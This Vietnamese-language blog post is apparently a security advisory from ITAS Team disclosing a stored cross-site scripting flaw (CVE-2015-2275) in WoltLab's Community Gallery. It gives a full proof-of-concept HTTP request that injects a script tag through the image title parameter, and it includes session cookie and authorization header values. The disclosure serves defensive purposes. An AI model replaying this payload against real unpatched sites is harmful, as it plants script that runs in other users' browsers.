ITAS Team phát hiện lỗ hổng Stored XSS trong Burning Board – Community Gallery

Cross-Site Scripting hay còn được gọi tắt là XSS (thay vì gọi tắt là CSS để tránh nhầm lẫn với CSS-Cascading Style Sheet của HTML) là một kĩ thuật tấn công bằng cách chèn vào các website động (ASP, PHP, CGI, JSP …) những thẻ HTML hay những đoạn mã script nguy hiểm có thể gây nguy hại cho những người sử dụng khác. Trong đó, những đoạn mã nguy hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML.
“Community Gallery” sử dụng dữ liệu của người dùng nhập vào từ biến parameters[data][7][ttitle] mà không có sự chặn lọc nào nên lỗ hổng Stored XSS đã xảy ra. Các cá nhân và tổ chức nào có sử dụng bộ sản phẩm này nên chú ý và cập nhật lên phiên bản mới nhất.

Thông tin về lỗ hổng:
– Lỗ hổng: Stored Cross-Site Scripting
– Nhà sản xuất: https://www.woltlab.com
– Download link: https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery
– Phiên bản lỗi: Community Gallery before 12/10/2014
– CVE ID: CVE-2015-2275
– Phiên bản sửa: Community Gallery after 12/26/2014
– Phát hiện bởi: Phạm Kiên Cường – cuong.k.pham@itas.vn và ITAS Team

Chi tiết lỗ hổng:
POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512d9eed HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/
Content-Length: 1300
Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3; __cfduid=dceb0da13e569549c9531d07b3d287acb1420598620
Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&objectIDs%5B%5D=7&meters%5Bdata%5D%5B7%5D%5BalbumID%5D=1&meters%5Bdata%5D%5B7%5D%5BcategoryIDs%5D%5B%5D=3&meters%5Bdata%5D%5B7%5D%5Bdescription%5D=test&meters%5Bdata%5D%5B7%5D%5BenableComments%5D=1&meters%5Bdata%5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg&meters%5Bdata%5D%5B7%5D%5Bfilesize%5D=47948&meters%5Bdata%5D%5B7%5D%5Bheight%5D=480&meters%5Bdata%5D%5B7%5D%5BimageID%5D=7&meters%5Bdata%5D%5B7%5D%5Blatitude%5D=0&meters%5Bdata%5D%5B7%5D%5Blongitude%5D=0&meters%5Bdata%5D%5B7%5D%5Borientation%5D=1&meters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing&meters%5Bdata%5D%5B7%5D%5BthumbnailHeight%5D=0&meters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5D=0&meters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0&meters%5Bdata%5D%5B7%5D%5BthumbnailY%5D=0&meters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg&meters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert(‘XSS’)%3C%2Fscript%3E&meters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg&meters%5Bdata%5D%5B7%5D%5Bwidth%5D=640&meters%5Bdata%5D%5B7%5D%5Blocation%5D=&meters%5BisEdit%5D=1

– Vulnerable parameter: parameters[data][7]

Công bố thông tin:
+ 12/10/2014: Phát hiện lỗ hổng
+ 12/10/2014: Gửi chi tiết về lỗ hổng cho nhà sản xuất
+ 03/10/2015: Công bố thông tin

DEMOSTRATION VIDEO

/ Blog / Tags: , ,

Chia sẻ bài này